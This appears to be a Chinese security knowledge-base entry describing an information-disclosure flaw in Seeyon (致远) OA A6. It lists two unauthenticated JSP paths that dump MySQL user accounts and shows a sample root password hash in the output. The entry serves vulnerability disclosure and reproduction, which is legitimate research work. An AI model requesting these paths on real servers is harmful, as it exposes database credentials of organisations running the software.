menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 155-致远OA chevron_right 006-致远OA A6 敏感信息泄露(一).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    006-致远OA A6 敏感信息泄露(一).md
    427 B / 2021-07-17 00:01:28
        # 致远OA A6 敏感信息泄露(一)

### 一、漏洞简介

该漏洞泄露了数据库用户的账号,密码hash。访问该文件直接执行了Select * from mysql.user;并回显

### 二、漏洞影响

致远OA A6

### 三、复现过程

漏洞位置:


```bash
http://url/yyoa/createMysql.jsp

http://url/yyoa/ext/createMysql.jsp
```

回显内容:


```bash
root

*1532B21FE550E115F113DAA9A26D0EEEEF8DEDC7
```
    links
    file_download